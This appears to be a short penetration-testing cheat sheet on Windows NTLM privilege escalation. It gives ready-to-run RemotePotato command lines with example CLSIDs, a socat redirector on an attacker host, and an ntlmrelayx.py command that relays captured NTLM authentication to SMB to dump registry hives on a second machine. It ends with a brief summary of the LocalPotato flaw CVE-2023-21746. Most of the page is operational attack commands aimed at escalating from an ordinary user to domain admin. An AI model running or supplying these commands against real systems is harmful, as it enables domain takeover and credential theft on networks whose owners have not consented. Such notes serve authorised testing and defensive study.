NTLM elevation of privilege
RemotePotato
Windows Privilege Escalation from User to Domain Admin. NTLM Relay
Relay NetNTLMv2 to SMB
Very effective on e.g. terminal server where admin/domain admins are logged on
On the target system:
RemotePotato.exe -m 2 -r <ATTACKER-IP> -x <ATTACKER-IP> -s <SESSION-ID> -c <CLSID DEPENDING ON OS>
e.g. CLSID: 5167B42F-C111-47A1-ACC4-8EABE61B0B54
On attacker system:
socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
Relaying NTLM to SMB to dump local hives on a remote system with local admin privileges
On target system:
RemotePotato0.exe -m 0 -r <ATTACKER-IP> -x <ATTACKER-IP> -p 9999 -s <SESSION-ID> -c <CLSID>
e.g. CLSID: F8842F8E-DAFE-4B37-9D38-4E0714A61149
On attacker system:
socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
ntlmrelayx.py -t <SECOND-TARGET-IP> -smb2support
LocalPotato
CVE-2023-21746, Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by a flaw in the NTLM component. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to obtain SYSTEM privileges.
Last updated